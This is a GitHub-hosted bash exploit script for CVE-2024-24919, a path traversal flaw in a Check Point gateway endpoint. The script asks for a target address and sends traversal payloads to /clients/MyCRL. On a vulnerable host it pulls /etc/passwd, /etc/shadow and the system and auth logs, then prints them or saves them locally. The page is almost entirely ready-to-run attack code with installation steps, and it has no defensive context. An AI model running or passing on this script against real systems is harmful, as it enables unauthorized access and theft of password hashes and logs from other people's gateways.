-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-24919.sh
29 lines (28 loc) · 1.7 KB
/
CVE-2024-24919.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#!/bin/bash
# PASS1: apt-get install parallel curl -y #
# PASS2: chmod +x CVE-2024-24919.sh #
# FOLLOW ME MY GIT: https://github.com/J4F9S5D2Q7 #
clear ; rm -rf messages.checkpoint auth.checkpoint
echo -e "IP_ADDRESS/URL:\n"; read host
request=$(timeout 10 curl -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/passwd" https://$host/clients/MyCRL | grep -oP "cli.sh" | head -n1)
if [ "$request" == "cli.sh" ]
then
clear
echo -e "\033[01;31m$host - VULNERABLE!\n"; tput sgr0
echo -ne '\033[01;32m█ █ █ █ █ █ █ [33%]\r'
sleep 1
echo -ne '█ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ [66%]\r'
sleep 1
echo -ne '█ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ [100%]\r'; tput sgr0
passwd=$(timeout 10 curl -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/passwd" https://$host/clients/MyCRL)
messages=$(timeout 10 curl -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../var/log/messages" https://$host/clients/MyCRL)
shadow=$(timeout 10 curl -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../etc/shadow" https://$host/clients/MyCRL)
auth=$(timeout 10 curl -s -k -X POST -H "Content-Type: text/plain" -d "aCSHELL/../../../../../../../var/log/auth" https://$host/clients/MyCRL)
echo -e "\n/etc/passwd:\n$passwd\n"
echo -e "/etc/shadow\n$shadow"
echo -e "$messages" >> messages.checkpoint
echo -e "$auth\n\n" >> auth.checkpoint
echo -e "\n\n\033[01;31mFILES CREATED: auth.checkpoint | messages.checkpoint FROM /var/log/messages | /var/log/auth - CHECK IT!\n\033[01;31m"; tput sgr0
else
echo -e "FAIL :("
fi